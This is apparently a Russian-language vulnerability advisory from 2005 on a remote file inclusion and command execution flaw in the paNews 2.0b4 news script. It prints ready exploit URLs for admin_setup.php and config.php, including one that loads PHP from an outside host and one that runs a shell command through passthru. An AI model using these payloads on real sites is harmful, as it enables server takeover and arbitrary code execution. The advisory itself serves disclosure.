Выполнение произвольных команд и php-инклюдинг в paNews

Дата публикации:
22.02.2005
Всего просмотров:
780
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе.

Уязвимость существует при обработке некоторых параметров в сценарии admin_setup.php при опции register_globals=on в конфигурационном файле php.ini. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий и произвольные команды на системе с привилегиями текущего web сервера. Примеры:

PHP-инклюдинг

http://victim/panews/includes/admin_setup.php?access[]= admins&do=updatesets&form[comments]= $nst&form[autoapprove]=$nst&disvercheck= $nst&installed=$asd&showcopy=include($nst)

http://victim/panews/includes/config.php?nst=http://your/file.php

Выполнение команд

http://victim/panews/includes/admin_setup.php?access[]=admins& amp;do=updatesets&form[comments]=$nst&form[autoapprove]= $nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)

http://victim/panews/includes/config.php?nst=id

Примечание: Для успешной реализации уязвимости необходимо отключить выполнение javscript сценариев в браузере.

URL производителя: http://www.phparena.net/panews.php

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Arbitrary Command Execution in paNews v2.0b4

или введите имя

CAPTCHA